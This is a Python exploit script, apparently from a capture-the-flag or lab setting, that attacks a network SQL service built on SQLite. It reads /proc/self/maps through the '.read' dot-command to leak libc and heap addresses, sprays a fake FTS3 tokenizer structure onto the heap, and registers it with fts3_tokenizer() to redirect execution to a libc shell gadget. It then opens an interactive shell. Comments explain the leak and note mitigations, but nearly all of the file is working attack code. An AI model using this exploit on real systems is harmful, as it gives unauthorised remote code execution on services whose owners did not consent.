#!/usr/bin/env python3 | |
import sys | |
# https://github.com/hellman/sock | |
from sock import Sock | |
import os | |
import sys | |
import struct | |
# In Apple M1, it is very hard to install pwntools, so just don't use it | |
# from pwn import * | |
print("Start Exploit !")
# Target selection: a single positional argument wins; otherwise fall back
# to the MY_IP environment variable, then to the hard-coded lab address.
_cli_args = sys.argv[1:]
if len(_cli_args) == 1:
    host = _cli_args[0]
else:
    print("Local Test")
    host = os.environ.get('MY_IP') or '10.60.3.3'
print(f"Target: {host}")
def execute(sql, last=False):
    """Send one statement over the module-level connection ``s`` and return the reply.

    The reply is everything the service emits up to its next ``"> "`` prompt,
    with the two prompt characters stripped. ``last`` is accepted for callers
    but not used.
    """
    global s
    conn = s
    conn.sendline(sql)
    reply = conn.readuntil("> ")
    return reply[:-2]
# Connect to the service and wait for its first SQL prompt.
s = Sock(host, 1433)
s.readuntil(">")
# The service passes the shell ".read" dot-command through to the server, so
# the server's own /proc/self/maps is readable over the SQL channel. This is
# the information leak the rest of the script relies on: it reveals the libc
# and heap base addresses and so defeats ASLR. Mitigation: a service that
# accepts SQL from untrusted clients must not expose shell dot-commands or
# any other file-read primitive.
map_raw = execute(".read /proc/self/maps")
maps = map_raw.splitlines()
# Hard-coded line indices into the maps listing and a 12-hex-digit prefix
# for the start address; both are specific to the author's target build.
libc_addr = int(maps[23][:12], 16)
heap_addr = int(maps[6][:12], 16)
# Fixed offset from the leaked libc base; valid only for the author's libc build.
spawn_shell_addr = libc_addr + 0xc96da
# spawn_shell_addr = 0xdeadbeef
# A fake tokenizer module: one zero 8-byte field followed by five 8-byte
# slots that all hold the same libc address, so whichever slot FTS3
# dereferences first transfers control there.
shell_struct = struct.pack("<Q", 0)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
# Plant the fake module in the server heap: replace() expands a 31337-byte
# zero blob into many copies of the payload, which the script expects to
# land at a stable heap offset. The surrounding 414E5941... bytes are
# presumably a marker for locating the copy in a debugger — TODO confirm.
execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")
# Calc from GDB
# Heap offset of the planted struct, measured with a debugger on the author's
# setup; any allocator or version difference invalidates it.
heap_offset = 0x1221b0
shell_struct_addr = heap_addr + heap_offset
print("Struct Addr:", hex(shell_struct_addr))
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()
# The two-argument fts3_tokenizer() registers a tokenizer from a raw pointer
# supplied as a blob. SQLite has disabled this form by default since 3.11;
# it only works when the build enables SQLITE_ENABLE_FTS3_TOKENIZER or the
# application turns on SQLITE_DBCONFIG_ENABLE_FTS3_TOKENIZER. A service that
# accepts untrusted SQL must leave it disabled — this line is the exploit's
# actual sink, and the leak above is only needed to feed it a valid address.
execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")
# s.interactive()
# Creating a table that uses the registered tokenizer makes FTS3 call through
# the fake module, i.e. the libc address chosen above; the script then hands
# the connection to the user.
s.sendline('create virtual table shell using fts3(tokenize=shell);')
s.interactive()